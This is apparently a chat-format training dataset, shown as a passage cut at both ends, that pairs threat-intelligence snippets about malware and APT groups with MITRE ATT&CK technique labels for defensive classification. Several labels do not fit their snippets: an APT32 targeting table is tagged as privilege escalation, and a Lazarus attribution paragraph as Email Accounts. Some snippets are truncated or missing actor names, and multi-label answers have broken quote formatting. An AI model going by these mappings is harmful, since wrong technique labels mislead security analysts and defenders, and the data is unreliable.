- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed: Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI). Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. Employing Python scripts to exploit vulnerable servers. Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.004 - Command and Scripting Interpreter: Bash', 'T1059.006 - Command and Scripting Interpreter: Python', 'T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1059.008 - Network Device CLI"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialog."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT has encrypted its payload with RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Backdoor.Oldrea samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses fake Transport Layer Security (TLS) to communicate with its C2 server, encoding data with RC4 encryption."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been used to execute remote commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can download additional plug-ins to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POLONIUM has used the AirVPN service for operational activity."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The AppleSeed payload has an export function named “DllRegisterServer” which will be called when the DLL is executed using RegSvr32.exe. DllRegisterServer has a function that is responsible for performing the DLL initialization and setup that includes the following steps"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The downloader’s process termination starts with killing the DDG Monero miner botnet client if present on the system, followed by a variety of other cryptominers, including other XMRig instances. This behavior is indicative of attempting to secure more host resources from competing miners. The malware also targets services belonging to Qihoo 360, an antivirus service, in order to reduce the chance of detection. However, taskkill is unable to to kill process related to Qihoo 360. Figure 5 shows the processes that the script attempts to terminate."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can encrypt and encode its configuration file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The program CrashReporter.exe is heavily obfuscated with the ADVObfuscation library, renamed “snowman” (Obfuscated Files or Information [T1027]). When run, it checks for the Maintain parameter and collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). The program also creates a scheduled SYSTEM task, named JMTCrashReporter, which runs CrashReporter.exe with the Maintain parameter at any user’s login (Scheduled Task/Job: Scheduled Task [T1053.005"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda adds persistence by creating Registry Run keys."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax retrieved a list of the system's network interface after execution."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkVishnya created new services for shellcode loaders distribution."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "code(2343)\", MsgBoxStyle.Critical, null); The dropper then writes the content of the payload which resides as plaintext in a resource within the .NET assembly to C:\\Users\\\\AppData\\Local\\Temp\\SystemDiskClean.ps1"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has used search order hijacking to run the loader Vcrodat."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With the emergence of the Log4j security vulnerability, we’ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems"
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has used \"cmd.exe\" to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can send data it retrieves to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has used malicious HTA files to drop and execute malware."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of Attor's plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has used a reconnaissance module to identify active processes and other associated loaded modules."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore has used \"openssl\" to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 added Registry Run keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has used PowerShell to download and execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A JHUHUGIT variant encodes C2 POST data base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter uses srvsvc.NetShareEnumAll MSRPC function to enumerate and SMB to connect to all discovered shares, including ADMIN$, C$, SYSVOL, and NETLOGON."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has downloaded source code from code repositories."
- },
- {
- "role": "assistant",
- "content": "T1213.003 - Code Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BACKSPACE may collect information about running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13)."
- },
- {
- "role": "assistant",
- "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Helminth VBScript receives a batch script to execute a set of commands in a command prompt."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sent a C2 response that was base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has used Mimikatz to obtain credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file names may vary from one version of the malware to another"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus can search for other machines connected to compromised host and attempt to map the network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Responses from the Pisloader C2 server are base32-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa has the capability to stop antivirus services and disable Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "esentutl can be used to copy files to/from a remote share."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get-Process | select Company Checks to see if any running processes have “Wireshark” or “Sysinternals” as the company name"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has the capability to download a VNC module from command and control (C2)."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Recall that when the malicious code is executed, it invokes the extract_ei function on its own binary image, to check if the file is infected. If so, it opens itself, and reads the trailer to get the offset of where the file’s original bytes are located. It then writes these bytes out to a new file named: .<orginalfilename>1. This file is then set executable (via chmod) and executed (via execl"
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A dropper used by installs itself into the ASEP Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run with a value named McUpdate."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FireEye’s blog, “Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims with SUNBURST Backdoor,” contains a wealth of useful information, all of which has been analyzed by Unit 42 researchers to help ensure Palo Alto Networks customers are protected."
- },
- {
- "role": "assistant",
- "content": "T1195 - Supply Chain Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Putty and VNC for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the T9000 installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can use fileless UAC bypass and create an elevated COM object to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deployed a bootkit along with to ensure its persistence on the victim. The bootkit shares code with some variants of ."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It was quite common to see scheduled tasks used to create persistence for the ransomware executable, PsExec, and occasionally some defense evasion batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Briba creates run key Registry entries pointing to malicious DLLs dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies"
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "tools contained an application to check performance of USB flash drives."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Andariel has conducted spearphishing campaigns that included malicious Word or Excel attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors collected a list of installed software on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "persists via a Launch Agent."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has used PowerShell loaders as part of execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy uses the Camellia cipher to encrypt communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry uses \"attrib +h\" to make some of its files hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Year Country Industry Malware 2014 Vietnam Network Security WINDSHIELD 2014 Germany Manufacturing WINDSHIELD 2015 Vietnam Media WINDSHIELD 2016 Philippines Consumer products KOMPROGO WINDSHIELD SOUNDBITE BEACON 2016 Vietnam Banking WINDSHIELD 2016 Philippines Technology Infrastructure WINDSHIELD 2016 China Hospitality WINDSHIELD 2016 Vietnam Media WINDSHIELD 2016 United States Consumer Products WINDSHIELD PHOREAL BEACON SOUNDBITE Table 1: APT32 Private Sector Targeting Identified by FireEye APT32 Interest in Political Influence and Foreign Governments In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
